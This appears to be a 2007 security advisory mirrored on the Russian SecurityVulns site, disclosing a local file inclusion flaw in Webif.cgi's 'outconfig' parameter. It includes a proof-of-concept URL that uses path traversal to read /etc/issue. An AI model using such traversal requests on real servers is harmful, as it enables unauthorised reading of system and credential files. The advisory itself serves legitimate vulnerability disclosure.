Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Fusetalk SQL injection submission.

  [email protected]
net

  fuzzylime (forum) XSS

  PHP hosting Biller

From:maiosyet_(at)_mawk.org <maiosyet_(at)_mawk.org>
Date:18 июня 2007 г.
Subject:Webif.cgi local file inclusion

.:: WEBIF.CGI LOCALE FILE INCLUSION ::.

[#] AUTHOR: maiosyet
[#] CONTACT: [email protected]
[#] SITE: http://www.mawk.org

[#] ORIGINAL ADV:
http://www.mawk.org/mods.php?mods=Core&page=view&id=102

[#] SOFTWARE: Webif.cgi
http://www.ifnet.it/webif/

[#] DESCRIPTION:
Webif is the natural solution for librarianships who want visibility across
the web or would like to manage Intranet networks, the whole at a reasonable price.

[#] BUG:
Input passed to the "outconfig" parameter in webif.cgi is not properly verified.
This can be exploited to include arbitrary files from local resources.

[#] PoC:
http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&
outconfig=../../../../etc/issue


[#] Thanks:
Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :*
Federico, Eveline (you know who you are).

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород